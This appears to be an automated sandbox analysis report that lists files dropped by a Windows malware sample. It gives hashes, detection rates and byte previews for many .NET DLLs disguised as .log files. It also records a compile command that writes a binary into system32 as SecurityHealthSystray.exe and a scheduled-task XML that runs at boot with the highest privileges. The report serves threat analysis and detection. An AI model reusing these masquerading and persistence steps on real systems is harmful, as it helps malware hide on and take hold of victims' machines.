Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.0.cs"

C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.out

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (360), with CRLF, CR line terminators
Category:	modified
Size (bytes):	781
Entropy (8bit):	5.266432427456426
Encrypted:	false
SSDEEP:	24:KJfC6MI/un/Vq79tWf1Q1Kax5DqBVKVrdFAMBJTH:uCTN/VquW1K2DcVKdBJj
MD5:	C6F470C95973FA863B21808F388C7D3E
SHA1:	4D0D011F4DB00B609B93A2AAC652302E3B70DAD2
SHA-256:	4CD220AF5F699A254543B34E797007AAB801EE8309CB316428F2D368C192FA57
SHA-512:	8D224280AF6C648FCADB24AEBB80FC9EEE90B136D22C7D32CE8081C524D53D8A0D5EC79DAC3EB11BD6DFF81F16F89934DF0F2CC39089EF6802A0542E65A54833
Malicious:	false
Preview:	.C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp

Download File

Process:	C:\ProgramData\setup.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	161792
Entropy (8bit):	5.8318794599287465
Encrypted:	false
SSDEEP:	3072:lQbW78Kb89UMmY8MA1cRWr7BiKcOO1Sf7lHn4mr3yo4f8P2:lQK75bobwfBiKCYfhHLU5
MD5:	1667C96053EAA078109F8B0C9500FC9D
SHA1:	E0F567763BAAAA757F66F96951D9810F45F69F30
SHA-256:	F7E1E53A6FB24A2BD9206305C59448A8F99B6F5847A6ACB18EB0FD9F7383FFB4
SHA-512:	6285ADE5CB85B71814EDD57EDDC512A031596043B7FCE4FCC909A0B78ECFE161C062AD0637EC82CBDAA36675AD32FBD0C94DDD96BB575BE8B1FBB47DF706AAE1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$.......K...............D.......D...........o...9A......9A9.....9A......Rich............PE..d....t.d.........."....%.....X......X".........@..........................................`..................................................8.......p..`>...`..8....................5..8............................................0...............................text............................... ..`.rdata.......0......."..............@..@.data........P......................@....pdata..8....`.......6..............@..@.rsrc...`>...p...@...8..............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yntnomxcupkb.xml

Download File

Process:	C:\ProgramData\setup.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	5.1015990235428035
Encrypted:	false
SSDEEP:	24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
MD5:	546D67A48FF2BF7682CEA9FAC07B942E
SHA1:	A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
SHA-256:	EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
SHA-512:	10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl

C:\Users\user\Desktop\CjJRSFHW.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\EcYAEBsU.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GQcIpPoS.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HMPjFLLW.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IJrrbLaQ.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KVBZghxI.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MAhhiIaK.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NOQISejH.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NXnICQCE.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PbqyFjSG.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\RKFGfNRs.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\THthvKov.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UuxpgXjt.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bbeWvQkg.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\chceADSX.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\eeEmWDhS.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iaFEdjXM.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ovdDmGAG.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
